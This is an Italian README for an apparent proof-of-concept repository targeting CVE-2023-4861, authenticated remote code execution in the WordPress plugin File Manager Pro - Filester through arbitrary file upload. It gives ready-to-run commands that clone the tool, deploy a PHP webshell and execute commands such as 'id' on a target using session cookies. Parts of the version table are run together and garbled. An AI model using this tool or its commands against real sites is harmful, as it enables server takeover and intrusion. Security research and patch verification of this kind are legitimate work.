
Automated proof-of-concept per l'esecuzione remota di codice autenticata in WordPress File Manager Pro (Filester) tramite caricamento arbitrario di file, inclusa la distribuzione di webshell e l'esecuzione di comandi.
Questo repository contiene una proof of concept in Python per CVE-2023-4861, un problema di esecuzione remota di codice autenticata nel plugin WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ su Filesterexploit.py automatizza lo stesso risultato di base descritto nell'avviso pubblico:
/var/www/html/ e permettere il caricamento di .php.Dettaglio implementativo importante: il mio PoC presuppone che la web root del target sia /var/www/html/. Questo è hardcoded nei dati della richiesta e potrebbe richiedere modifiche per altre configurazioni di laboratorio.
Clona il repository ed entraci:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Installa le dipendenze:
pip install requests
Mostra l'aiuto:
python3 exploit.py --help
Esempio base:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Nome shell personalizzato opzionale:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'